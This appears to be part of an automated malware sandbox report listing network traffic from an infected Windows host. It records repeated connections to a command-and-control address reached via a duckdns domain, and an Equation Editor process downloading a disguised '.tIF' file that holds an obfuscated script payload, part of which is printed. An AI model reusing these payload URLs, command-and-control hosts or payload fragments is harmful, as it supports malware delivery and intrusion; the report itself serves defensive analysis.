                        Sep 26, 2024 10:35:16.475047112 CEST1464549169192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:16.475056887 CEST1464549169192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:16.475094080 CEST4916914645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:16.631949902 CEST4916414645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:17.019356966 CEST4916914645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:17.054548025 CEST4916414645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:17.055289030 CEST4916714645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:17.059369087 CEST1464549164192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.060111046 CEST1464549167192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.176548004 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.202471018 CEST4916814645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:17.204595089 CEST4916814645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:17.207561016 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.207573891 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.207587957 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.207597017 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.207614899 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.207623959 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.207659006 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.207668066 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.207675934 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.207684040 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.207731962 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.207741022 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.207796097 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.207804918 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.208319902 CEST4916814645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:17.209521055 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.209530115 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.209583998 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.209593058 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.209616899 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.209625959 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.209681034 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.209697962 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.209758043 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.209794044 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.209825039 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.209832907 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.209876060 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.209908962 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.213215113 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.213232040 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:17.213251114 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.067526102 CEST4916714645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:18.072556973 CEST1464549167192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.175261974 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.217469931 CEST4916814645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:18.219600916 CEST4916814645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:18.222325087 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.222420931 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.222436905 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.222445965 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.222486019 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.222493887 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.222589016 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.222621918 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.222702026 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.222718000 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.227044106 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.227312088 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.227320910 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.227329969 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.227339983 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.227371931 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.227670908 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.227746964 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.227772951 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.227798939 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.227848053 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.227874041 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.227900028 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.227925062 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.227943897 CEST4916814645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:18.227968931 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.227997065 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.228024006 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.228049040 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.232894897 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.233031034 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.233057976 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.439677954 CEST4916914645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:18.444917917 CEST1464549169192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.444974899 CEST4916914645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:18.445171118 CEST1464549169192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.445226908 CEST4916914645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:18.450069904 CEST1464549169192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.450100899 CEST1464549169192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.450133085 CEST1464549169192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.450155973 CEST4916914645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:18.450205088 CEST4916914645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:18.450330019 CEST1464549169192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.450376987 CEST4916914645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:18.455137968 CEST1464549169192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.455166101 CEST1464549169192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.455193996 CEST4916914645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:18.455292940 CEST1464549169192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.455319881 CEST1464549169192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.455528021 CEST1464549169192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.455554962 CEST1464549169192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.455583096 CEST1464549169192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.455607891 CEST1464549169192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.456756115 CEST4916914645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:18.460220098 CEST1464549169192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.460426092 CEST1464549169192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.460542917 CEST1464549169192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.462234974 CEST1464549169192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:18.465954065 CEST4916914645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:20.631949902 CEST4916714645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:20.941108942 CEST1464549167192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.049217939 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.073199987 CEST4916814645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:21.075293064 CEST4916814645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:21.078521967 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.078552961 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.078579903 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.078629971 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.078658104 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.078684092 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.078710079 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.078735113 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.078761101 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.078830004 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.083020926 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.083076000 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.083146095 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.083226919 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.083308935 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.083370924 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.083415031 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.083441973 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.083467960 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.083492994 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.083518982 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.083544016 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.083569050 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.083594084 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.083619118 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.083645105 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.083669901 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.083674908 CEST4916814645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:21.083695889 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.088632107 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.088660955 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.088686943 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.642493963 CEST4916714645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:21.649473906 CEST1464549167192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.749340057 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.773968935 CEST4916814645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:21.776146889 CEST4916814645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:21.779001951 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.779016972 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.779028893 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.779040098 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.779052973 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.779063940 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.779171944 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.779182911 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.779195070 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.779364109 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.783777952 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.783790112 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.783819914 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.783849001 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.783862114 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.783958912 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.783971071 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.783991098 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.784010887 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.784038067 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.784049034 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.784060001 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.784070969 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.784117937 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.784132004 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.784153938 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.784173012 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.784183979 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.784291983 CEST4916814645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:21.784291983 CEST4916814645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:21.789203882 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.789216995 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:21.789228916 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.654304981 CEST4916714645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:22.659399033 CEST1464549167192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.762228966 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.792808056 CEST4916814645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:22.795042992 CEST4916814645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:22.797753096 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.797779083 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.797792912 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.797806025 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.797817945 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.797828913 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.797945976 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.797957897 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.798021078 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.798264027 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.802476883 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.802489996 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.802525997 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.802541018 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.802556992 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.802587032 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.802598953 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.802654982 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.802670956 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.802709103 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.802723885 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.802751064 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.802762985 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.802787066 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.802798033 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.802817106 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.802829027 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.802839994 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.803158045 CEST4916814645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:22.808006048 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:22.808135033 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.669281006 CEST4916714645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:23.674295902 CEST1464549167192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.779298067 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.813453913 CEST4916814645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:23.815608978 CEST4916814645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:23.818480015 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.818500996 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.818559885 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.818568945 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.818589926 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.818598032 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.818645000 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.818653107 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.818686962 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.818723917 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.823194027 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.823203087 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.823282003 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.823290110 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.823319912 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.823378086 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.823399067 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.823453903 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.823462963 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.823506117 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.823513985 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.823554993 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.823565006 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.823596001 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.823630095 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.823673010 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.823724985 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.823734999 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.823826075 CEST4916814645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:23.823826075 CEST4916814645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:23.828809977 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.828819990 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.828826904 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.835598946 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.835752010 CEST4916814645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:23.835796118 CEST4916814645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:23.837515116 CEST1464549167192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:23.837601900 CEST4916714645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:23.840748072 CEST1464549168192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:24.682590961 CEST4916714645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:24.687685966 CEST1464549167192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:46.621634007 CEST1464549164192.210.150.29192.168.2.22
                        Sep 26, 2024 10:35:46.623367071 CEST4916414645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:35:46.628278971 CEST1464549164192.210.150.29192.168.2.22
                        Sep 26, 2024 10:36:16.874304056 CEST1464549164192.210.150.29192.168.2.22
                        Sep 26, 2024 10:36:16.879919052 CEST4916414645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:36:16.884865999 CEST1464549164192.210.150.29192.168.2.22
                        Sep 26, 2024 10:36:47.382083893 CEST1464549164192.210.150.29192.168.2.22
                        Sep 26, 2024 10:36:47.383764029 CEST4916414645192.168.2.22192.210.150.29
                        Sep 26, 2024 10:36:47.388657093 CEST1464549164192.210.150.29192.168.2.22

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Sep 26, 2024 10:33:08.757597923 CEST5456253192.168.2.228.8.8.8
                        Sep 26, 2024 10:33:08.767708063 CEST53545628.8.8.8192.168.2.22
                        Sep 26, 2024 10:33:14.842161894 CEST5291753192.168.2.228.8.8.8
                        Sep 26, 2024 10:33:14.950571060 CEST53529178.8.8.8192.168.2.22
                        Sep 26, 2024 10:33:17.528398037 CEST6275153192.168.2.228.8.8.8
                        Sep 26, 2024 10:33:17.537029028 CEST53627518.8.8.8192.168.2.22

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Sep 26, 2024 10:33:08.757597923 CEST192.168.2.228.8.8.80x9af3Standard query (0)ia600100.us.archive.orgA (IP address)IN (0x0001)false
                        Sep 26, 2024 10:33:14.842161894 CEST192.168.2.228.8.8.80x4531Standard query (0)authurremc.duckdns.orgA (IP address)IN (0x0001)false
                        Sep 26, 2024 10:33:17.528398037 CEST192.168.2.228.8.8.80xcd37Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Sep 26, 2024 10:33:08.767708063 CEST8.8.8.8192.168.2.220x9af3No error (0)ia600100.us.archive.org207.241.227.240A (IP address)IN (0x0001)false
                        Sep 26, 2024 10:33:14.950571060 CEST8.8.8.8192.168.2.220x4531No error (0)authurremc.duckdns.org192.210.150.29A (IP address)IN (0x0001)false
                        Sep 26, 2024 10:33:17.537029028 CEST8.8.8.8192.168.2.220xcd37No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • ia600100.us.archive.org
                        • 185.29.10.52
                        • geoplugin.net

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.2249161185.29.10.52803352C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 10:33:03.408983946 CEST343OUTGET /550/makepicturewithgreatthingstobeonline.tIF HTTP/1.1
                        Accept: */*
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: 185.29.10.52
                        Connection: Keep-Alive
                        Sep 26, 2024 10:33:04.049181938 CEST1236INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 08:36:03 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                        Last-Modified: Thu, 26 Sep 2024 01:34:46 GMT
                        ETag: "3b21c-622fbbe693b20"
                        Accept-Ranges: bytes
                        Content-Length: 242204
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: image/tiff
                        Data Raw: ff fe 61 00 4c 00 54 00 43 00 4b 00 6e 00 6f 00 48 00 6e 00 63 00 43 00 66 00 5a 00 54 00 64 00 64 00 6f 00 69 00 4a 00 63 00 50 00 50 00 63 00 20 00 3d 00 20 00 22 00 43 00 7a 00 57 00 6b 00 47 00 41 00 4c 00 6a 00 57 00 50 00 61 00 4b 00 63 00 50 00 63 00 4a 00 52 00 76 00 75 00 68 00 57 00 63 00 5a 00 22 00 0d 00 0a 00 75 00 63 00 47 00 63 00 65 00 51 00 4e 00 63 00 4b 00 5a 00 6a 00 63 00 4c 00 51 00 49 00 57 00 49 00 49 00 66 00 42 00 4e 00 6f 00 4c 00 20 00 3d 00 20 00 22 00 50 00 49 00 6f 00 4b 00 57 00 7a 00 6a 00 66 00 57 00 41 00 62 00 57 00 47 00 6f 00 71 00 4b 00 4e 00 68 00 41 00 57 00 4c 00 4c 00 42 00 22 00 0d 00 0a 00 61 00 6f 00 5a 00 61 00 47 00 62 00 73 00 4c 00 78 00 6e 00 4b 00 4b 00 70 00 47 00 55 00 53 00 49 00 63 00 4c 00 70 00 50 00 72 00 55 00 20 00 3d 00 20 00 22 00 5a 00 75 00 57 00 4b 00 78 00 47 00 6e 00 70 00 6e 00 48 00 47 00 52 00 4c 00 69 00 63 00 57 00 43 00 71 00 6f 00 55 00 6b 00 6b 00 68 00 22 00 0d 00 0a 00 72 00 4f 00 55 00 55 00 41 00 6d 00 65 00 41 00 69 00 [TRUNCATED]
                        Data Ascii: aLTCKnoHncCfZTddoiJcPPc = "CzWkGALjWPaKcPcJRvuhWcZ"ucGceQNcKZjcLQIWIIfBNoL = "PIoKWzjfWAbWGoqKNhAWLLB"aoZaGbsLxnKKpGUSIcLpPrU = "ZuWKxGnpnHGRLicWCqoUkkh"rOUUAmeAiaZapCGGpTWGKLW = "iKgicKCpeqhKTkWoLNGLHka"nlOGlcLSWWOWokLkWJcseLU = "WKccLUKWocjfOKaLpQUCRON"oHLWOibmhZszRBKLUiLcWiJ = "TzLpfphBbclHLjlqLxWZbPz"WsdULzppWLKkGLGxWLzuhia = "iUjimfmphLbQNgCeKNkbWvA"KsWamhKzpkbifWWoKWbdWxz = "ItBKLxSkjdJPmeuiZRLGWuh"idlrlzUmGCUozbioczPLmkN = "ZGccGfheZ
                        Sep 26, 2024 10:33:04.049241066 CEST1236INData Raw: 00 69 00 6c 00 55 00 6b 00 76 00 41 00 61 00 63 00 65 00 72 00 6e 00 61 00 64 00 61 00 61 00 65 00 63 00 6b 00 4b 00 22 00 0d 00 0a 00 55 00 69 00 4c 00 4c 00 41 00 71 00 7a 00 61 00 55 00 47 00 63 00 4c 00 66 00 7a 00 6c 00 55 00 73 00 70 00 6c
